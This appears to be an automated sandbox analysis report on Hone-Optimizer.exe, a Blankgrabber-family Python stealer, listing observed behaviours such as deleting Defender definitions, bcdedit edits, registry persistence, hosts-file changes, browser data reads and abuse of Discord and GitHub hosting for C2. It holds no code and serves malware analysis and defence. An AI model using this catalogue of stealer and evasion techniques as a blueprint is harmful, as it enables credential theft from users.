Analysis Overview
SHA256
07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65
Threat Level: Known bad
The file Hone-Optimizer.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Deletes Windows Defender Definitions
Modifies boot configuration data using bcdedit
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Active Setup
Event Triggered Execution: Image File Execution Options Injection
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Obfuscated Files or Information: Command Obfuscation
Power Settings
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Enumerates processes with tasklist
UPX packed file
Launches sc.exe
Hide Artifacts: Ignore Process Interrupts
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Time Discovery
Browser Information Discovery
Modifies registry class
Checks SCSI registry key(s)
Gathers network information
Detects videocard installed
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Modifies Internet Explorer settings
cURL User-Agent
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-14 11:53
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 11:53
Reported
2024-11-14 11:59
Platform
win10ltsc2021-20241023-en
Max time kernel
298s
Max time network
369s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\IoPriority = "3" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\CpuPriorityClass = "4" | C:\Windows\system32\reg.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | N/A | N/A |
| File opened (read-only) | \??\F: | N/A | N/A |
| File opened (read-only) | \??\D: | N/A | N/A |
| File opened (read-only) | \??\F: | N/A | N/A |
| File opened (read-only) | \??\D: | N/A | N/A |
| File opened (read-only) | \??\D: | N/A | N/A |
| File opened (read-only) | \??\D: | N/A | N/A |
| File opened (read-only) | \??\F: | N/A | N/A |
| File opened (read-only) | \??\D: | N/A | N/A |
| File opened (read-only) | \??\F: | N/A | N/A |
| File opened (read-only) | \??\F: | N/A | N/A |
| File opened (read-only) | \??\F: | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Power Settings
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CBS.log | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe | N/A |
| File opened for modification | C:\Windows\CbsTemp | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe | N/A |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Launches sc.exe
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
System Time Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | N/A | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\es-ES\\VoiceActivation_es-ES.dat" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - ja-JP Embedded DNN v11.1" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\sidubm.table" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
